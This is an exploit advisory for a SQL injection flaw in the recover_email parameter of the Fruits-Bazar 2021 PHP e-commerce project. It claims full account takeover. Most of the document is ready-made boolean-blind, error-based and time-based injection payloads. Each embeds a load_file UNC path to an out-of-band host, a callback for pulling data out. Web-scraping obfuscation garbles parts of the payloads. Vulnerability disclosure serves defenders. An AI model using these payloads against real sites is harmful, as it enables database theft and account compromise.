Fruits-Bazar 2021 1.0 SQL Injection Vulnerability

## Title: Fruits-Bazar 2021 v1.0 SQLi
## Author: nu11secur1ty
## Vendor: https://github.com/creativesaiful
## Software: https://github.com/creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Md-Saiful-Islam-creativesaiful/2021/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar

## Description:
The recover_email parameter appears to be vulnerable to SQL injection attacks.
The attacker can take access to all accounts on this system.
Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: recover_email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]@[email protected]@[email protected]'+(select
load_file('\\\\[email protected]@[email protected]\\olg'))+''
OR NOT 9177=9177 AND 'HeFM'='HeFM&u_pass_recover=Recover Password

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: [email protected]@[email protected]@[email protected]'+(select
load_file('\\\\[email protected]@[email protected]\\olg'))+''
AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT
(ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
'Mvga'='Mvga&u_pass_recover=Recover Password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]@[email protected]@[email protected]'+(select
load_file('\\\\[email protected]@[email protected]\\olg'))+''
AND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND
'qfSm'='qfSm&u_pass_recover=Recover Password
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Md-Saiful-Islam-creativesaiful/2021/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar)

## Proof and Exploit:
[href](https://streamable.com/ngodwj)